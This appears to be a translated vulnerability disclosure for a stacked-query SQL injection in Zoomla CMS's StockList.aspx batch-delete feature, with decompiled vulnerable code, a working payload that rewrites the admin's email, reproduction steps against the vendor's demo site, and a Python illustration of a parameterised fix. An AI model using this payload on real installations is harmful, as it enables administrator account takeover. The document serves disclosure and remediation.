### Summary:
My previous submission was ignored outright, so this time I had to test against the official demo. Also, this hole has existed since 2008.
### Details:
This is an UPDATE-type SQL injection (a second statement is stacked onto the DELETE).
File: /user/usershop/StockList.aspx, vulnerable parameter: Item
The vulnerable code (decompiled, shown as found):
```
protected void Button3_Click(object sender, EventArgs e)
{
    // Raw value of the "Item" form field (the checkbox values), taken without validation
    string text = base.Request.Form["Item"];
    if (!string.IsNullOrEmpty(text) && this.bll.delstock(text)) // <-- user input passed straight to delstock()
    {
        // "Batch delete succeeded!"
        base.Response.Write("<script language=javascript>alert('批量删除成功!');location.href='StockManage.aspx';</script>");
        return;
    }
    // "Batch delete failed! Please select the data you want to delete"
    base.Response.Write("<script language=javascript>alert('批量删除失败!请选择您要删除的数据');location.href='StockManage.aspx';</script>");
}
public bool delstock(string str)
{
    // str is concatenated into the IN (...) list with no escaping and no type check
    string strSql = "delete from ZL_UserStock where (id in (" + str + "))";
    return SqlHelper.ExecuteSql(strSql, null);
}
```
Craft the parameter:
```
0))update ZL_User set Email='wooyun' where username='admin'-- // changes the user's email; this could just as well be changed to reset the admin password
```
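As an added illustration (not code from the report or from Zoomla), the following Python models what delstock() does with the payload above and puts a hardened replacement beside it: the Item list is validated as a comma-separated list of integers and bound through a parameterised IN (...) list, so no attacker-controlled text ever reaches the SQL string. The table and column names come from the report; the in-memory SQLite backend and the sample rows are constructed for the demo. In the real ASP.NET code the equivalent fix would be int.TryParse on each ID plus SqlParameter bindings in SqlHelper.

```python
import re
import sqlite3
from typing import List

# Payload from the report, exactly as submitted in the Item form field.
PAYLOAD = "0))update ZL_User set Email='wooyun' where username='admin'--"


def build_delstock_sql(item: str) -> str:
    """Reproduces the vulnerable concatenation in delstock() from StockList.aspx.

    With PAYLOAD this yields:
        delete from ZL_UserStock where (id in (0))update ZL_User set Email='wooyun' where username='admin'--))
    SQL Server accepts the stacked UPDATE without a separator, and the trailing '--'
    comments out the leftover '))', so the UPDATE runs. (Not executed here: SQLite
    would not parse the unseparated second statement.)
    """
    return "delete from ZL_UserStock where (id in (" + item + "))"


def parse_id_list(item: str) -> List[int]:
    """Hardened replacement: Item must be a comma-separated list of positive integers."""
    ids = []
    for part in item.split(","):
        part = part.strip()
        if not re.fullmatch(r"[0-9]{1,9}", part):
            raise ValueError("rejected Item value: %r" % part)
        ids.append(int(part))
    if not ids:
        raise ValueError("empty Item list")
    return ids


def delstock_safe(conn: sqlite3.Connection, item: str) -> int:
    """Deletes the listed rows with a parameterised IN (?, ?, ...) list; returns the row count."""
    ids = parse_id_list(item)
    placeholders = ",".join("?" * len(ids))
    cur = conn.execute("delete from ZL_UserStock where id in (%s)" % placeholders, ids)
    conn.commit()
    return cur.rowcount


def make_demo_db() -> sqlite3.Connection:
    """Constructed sample data for the demo; not real Zoomla data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        create table ZL_UserStock (id integer primary key, note text);
        create table ZL_User (username text primary key, Email text);
        insert into ZL_UserStock values (1, 'a'), (2, 'b'), (3, 'c');
        insert into ZL_User values ('admin', 'admin@example.invalid');
        """
    )
    return conn


def admin_email(conn: sqlite3.Connection) -> str:
    """Helper to show the admin row is untouched by the hardened path."""
    return conn.execute("select Email from ZL_User where username='admin'").fetchone()[0]


if __name__ == "__main__":
    print(build_delstock_sql(PAYLOAD))
    conn = make_demo_db()
    print("deleted:", delstock_safe(conn, "2,3"))
    try:
        delstock_safe(conn, PAYLOAD)
    except ValueError as exc:
        print("blocked:", exc)
    print("admin email still:", admin_email(conn))
```

The integer whitelist is the important part: with an IN list, a parameter per value is the only way to bind it, and rejecting anything that is not a plain integer also removes the stacked-query and comment tricks the payload relies on.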
Procedure: after logging in, visit
http://demo.zoomla.cn/user/usershop/stocklist.aspx?Stocktype=1&a=aaa&id=111
and use Firebug to edit the page's <table> contents.
Screenshot:
[<img src="https://images.seebug.org/upload/201405/14224518ec41affe7aecf9dd2118f73ffa244526.png" alt=".png" width="600">](https://images.seebug.org/upload/201405/14224518ec41affe7aecf9dd2118f73ffa244526.png)
The table contents are:
```
<table width="100%" border="0" cellspacing="0" cellpadding="0" style="margin: 0 auto;background-color: white;" class="border">
<tbody><tr align="center" style="background:#FFBD59">
<td width="5%" class="title"><input type="checkbox" onclick="javascript:CheckAll(this);" name="Checkall" id="Checkall"></td>
<td width="13%" class="title">Document type</td>
<td width="20%" class="title">Document number</td>
<td width="15%" class="title">
Entry time</td>
<td width="12%" class="title"> Entered by</td>
<td width="20%" class="title"> Remarks</td>
<td width="15%" class="title"> Actions</td>
</tr>
<tr onmouseout="this.className='tdbg'" onmouseover="this.className='tdbgmouseover'" class="tdbg">
<td height="22" align="center"><input type="checkbox" value="3" name="Item"></td>
<td height="22" align="center">Outbound</td>
<td height="22" align="center">Order</td>
<td height="22" align="center">2014/5/14 21:54:09</td>
<td height="22" align="center">admin</td>
<td height="22" align="center">nice</td>
<td height="22" align="center"><a href="StockAdd.aspx?menu=edit&id=3">Edit</a> <a onclick="return confirm('This deletion cannot be undone. Are you sure you want to delete this record?');" href="Stocklist.aspx?menu=del&id=3">Delete</a></td>
</tr>
<tr onmouseout="this.className='tdbg'" onmouseover="this.className='tdbgmouseover'" class="tdbg">
<td height="22" align="center"><input type="checkbox" value="2" name="Item"></td>
<td height="22" align="center">Outbound</td>
<td height="22" align="center">Order</td>
<td height="22" align="center">2014/5/14 21:54:09</td>
<td height="22" align="center">admin</td>
<td height="22" align="center">nice</td>
<td height="22" align="center"><a href="StockAdd.aspx?menu=edit&id=2">Edit</a> <a onclick="return confirm('This deletion cannot be undone. Are you sure you want to delete this record?');" href="Stocklist.aspx?menu=del&id=2">Delete</a></td>
</tr>
<tr class="tdbg">
<td height="22" align="center" class="tdbgleft" colspan="10"><span id="Allnum">2</span> records in total <span id="Toppage"><a href="?Stocktype=0&Currentpage=0">First</a></span> <span class="aspNetDisabled" id="Nextpage"><a href="?Stocktype=0&Currentpage=0">Previous</a></span> <span class="aspNetDisabled" id="Downpage"><a href="?Stocktype=0&Currentpage=1">Next</a></span> <span id="Endpage"><a href="?Stocktype=0&Currentpage=1">Last</a></span> Page <span id="Nowpage">1</span>/<span id="PageSize">1</span> <span id="pagess">10</span> records/page Go to page <select id="DropDownList1" onchange="javascript:setTimeout('__doPostBack(\'DropDownList1\',\'\')', 0)" name="DropDownList1">
<option value="1">1</option>
</select></td>
</tr>
</tbody></table>
```
Change the value of one of the Item checkboxes to the crafted payload:
[<img src="https://images.seebug.org/upload/201405/1422502911f9322c7c7dfc6b7ecf9784c34f7ca6.png" alt="Value.png" width="600">](https://images.seebug.org/upload/201405/1422502911f9322c7c7dfc6b7ecf9784c34f7ca6.png)
Then tick that checkbox and click the batch delete button; the injected UPDATE runs along with the DELETE.
### Proof of vulnerability:
[<img src="https://images.seebug.org/upload/201405/14224711388b572bb4b9879b1aff8ff035e1edf2.png" alt=".png" width="600">](https://images.seebug.org/upload/201405/14224711388b572bb4b9879b1aff8ff035e1edf2.png)
The locally downloaded CMS2 V1.3, V1.4, V1.5 and CMS6.0 are all affected.
Judging from the earliest copy of this file, the hole has existed since 2008.